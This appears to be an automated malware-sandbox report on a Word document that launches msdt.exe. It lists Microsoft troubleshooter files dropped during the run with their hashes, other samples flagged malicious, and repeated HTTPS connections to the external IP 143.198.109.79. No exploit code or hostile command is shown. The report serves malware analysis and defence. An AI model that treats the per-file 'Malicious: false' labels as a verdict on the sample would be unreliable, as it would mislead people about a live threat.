Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
Process:C:\Windows\SysWOW64\msdt.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):66560
Entropy (8bit):6.926109943059805
Encrypted:false
SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
MD5:6E492FFAD7267DC380363269072DC63F
SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: icRTA4gcSe.docx, Detection: malicious
• Filename: order.docx, Detection: malicious
• Filename: Court Fine.doc, Detection: malicious
• Filename: 20220714 DWG.doc, Detection: malicious
• Filename: purchase order.xlsx, Detection: malicious
• Filename: WF0SlQWKr1.docx, Detection: malicious
• Filename: V3g2Pfu707.docx, Detection: malicious
• Filename: 5YMh6S8QVr.docx, Detection: malicious
• Filename: ZDhoKQk8G6.docx, Detection: malicious
• Filename: TranQuangDai.docx, Detection: malicious
• Filename: doc782.docx, Detection: malicious
• Filename: 68101181_048154.img, Detection: malicious
• Filename: doc782.docx, Detection: malicious
• Filename: doc1712.docx, Detection: malicious
• Filename: R346ltaP9w.rtf, Detection: malicious
• Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious
• Filename: WykHEO9BQN.rtf, Detection: malicious
• Filename: lol666 (2).bat, Detection: malicious
• Filename: EISPv0c56U.doc, Detection: malicious
• Filename: mjpoc_slide.doc, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\msdt.exe
File Type:ISO-8859 text, with CRLF line terminators
Category:dropped
Size (bytes):50242
Entropy (8bit):4.932919499511673
Encrypted:false
SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
MD5:EDF1259CD24332F49B86454BA6F01EAB
SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
Malicious:false
Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
Process:C:\Windows\SysWOW64\msdt.exe
File Type:UTF-8 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):16946
Entropy (8bit):4.860026903688885
Encrypted:false
SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
MD5:2C245DE268793272C235165679BF2A22
SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
Malicious:false
Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
Process:C:\Windows\SysWOW64\msdt.exe
File Type:ISO-8859 text, with CRLF line terminators
Category:dropped
Size (bytes):453
Entropy (8bit):4.983419443697541
Encrypted:false
SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
MD5:60A20CE28D05E3F9703899DF58F17C07
SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
Malicious:false
Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
Process:C:\Windows\SysWOW64\msdt.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):6650
Entropy (8bit):3.6751460885012333
Encrypted:false
SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
MD5:E877AD0545EB0ABA64ED80B576BB67F6
SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
Malicious:false
Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
Process: C:\Windows\SysWOW64\msdt.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 10752
Entropy (8bit): 3.517898352371806
Encrypted: false
SSDEEP: 96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
MD5: CC3C335D4BBA3D39E46A555473DBF0B8
SHA1: 92ADCDF1210D0115DB93D6385CFD109301DEAA96
SHA-256: 330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
SHA-512: 49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\msdt.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 48956
Entropy (8bit): 5.103589775370961
Encrypted: false
SSDEEP: 768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
MD5: 310E1DA2344BA6CA96666FB639840EA9
SHA1: E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
SHA-256: 67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
SHA-512: 62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
Malicious: false
Preview: <?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

File type: Microsoft OOXML
Entropy (8bit): 7.832260939059278
TrID:
• Word Microsoft Office Open XML Format document (49504/1) 49.01%
• Word Microsoft Office Open XML Format document (43504/1) 43.07%
• ZIP compressed archive (8000/1) 7.92%
File name: qoIZSkdejM.docx
File size: 10469
MD5: 0d37337ead8492e1b2395f6cd4f724fc
SHA1: a66ff1064025c026f2d88b87796009ba34c1bee8
SHA256: cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
SHA512: 113711a807da1417cff28760d0050543631c969725c65b7b32da874cc07c16baa24a894c97ffc185cbdc574c62f078621216d7e970cdf7c89e553ca5f2fdbd2a
SSDEEP: 192:R8D/fgUUn+iZ7dADiIF8TBIuICjBlK2dRBeVeT6lf/XO+ra8a:R8bfgzn+iZ7dADiIF8NIFCu2dRBOm6lK
TLSH: 9322BF35DF0A2D52C00BC23B60060706E44B68F3DA6F2A4FF6901AD6CD624EC175DD5E
File Content Preview: PK...........T...lU... .......[Content_Types].xml...N.0.E.H.C.m..e..j...%T.|.kOZ..dO_...)..J#..DJf.=w.....5..b...lP.Y.Nz...d.....e..S.x.%.Bb....p...2R.T..b..<..X....Q......8.A..1.~...r.....k.6.>B%.....}n.D0.e.Mc.*...h)..|...%...R.z.B...............&j..DD|
Icon Hash: 74fcd0d2d6d6d0cc

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 18, 2022 08:34:47.013371944 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.013432026 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.013545990 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.013973951 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.013993025 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.380207062 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.380395889 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.406874895 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.406907082 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.407172918 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.408890963 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.451384068 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.730277061 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.730345011 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.730469942 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.737023115 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.737052917 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.737065077 CEST | 49741 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.737073898 CEST | 443 | 49741 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.810991049 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.811052084 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:47.811173916 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.811434984 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:47.811451912 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:48.161988974 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:48.162623882 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:48.162676096 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:48.164474964 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:48.164505005 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:48.508094072 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:48.508224964 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:48.508285999 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:48.509584904 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:48.509624958 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:48.509640932 CEST | 49742 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:48.509651899 CEST | 443 | 49742 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:51.547524929 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:51.547570944 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:51.547744036 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:51.547998905 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:51.548013926 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:51.908436060 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:51.909096003 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:51.909116030 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:51.911393881 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:51.911411047 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.264444113 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.264519930 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.264609098 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.264751911 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.264767885 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.264794111 CEST | 49743 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.264801025 CEST | 443 | 49743 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.383800030 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.383826971 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.383946896 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.384795904 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.384807110 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.749547005 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.749768019 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.796416998 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.796448946 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.796708107 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:52.796803951 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.797610044 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:52.839401960 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:53.106933117 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:53.107013941 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
Aug 18, 2022 08:34:53.107074022 CEST | 49744 | 443 | 192.168.2.4 | 143.198.109.79
Aug 18, 2022 08:34:53.107096910 CEST | 443 | 49744 | 143.198.109.79 | 192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.107110977 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.107173920 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110171080 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110275984 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110297918 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110327005 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110780001 CEST49744443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.110796928 CEST44349744143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.334995985 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335031986 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335129976 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335481882 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.335494041 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.686470985 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.686671019 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.687242031 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.687254906 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.693726063 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:53.693757057 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035067081 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035320044 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035334110 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035494089 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035556078 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035620928 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035712957 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035727024 CEST44349745143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035742998 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.035782099 CEST49745443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.215761900 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.215801001 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.215888023 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.216280937 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.216291904 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.589816093 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.589998007 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.590410948 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.590419054 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.593725920 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.593744040 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949111938 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949254990 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949357986 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949415922 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949430943 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:54.949464083 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.014930010 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.014971018 CEST44349746143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.015073061 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.015089989 CEST49746443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137301922 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137373924 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137474060 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137681007 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.137705088 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.500863075 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.510864019 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.510917902 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.512223005 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.512245893 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.856849909 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.856945038 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857042074 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857081890 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857100964 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857116938 CEST49747443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:55.857124090 CEST44349747143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482027054 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482069969 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482151031 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482361078 CEST49748443192.168.2.4143.198.109.79
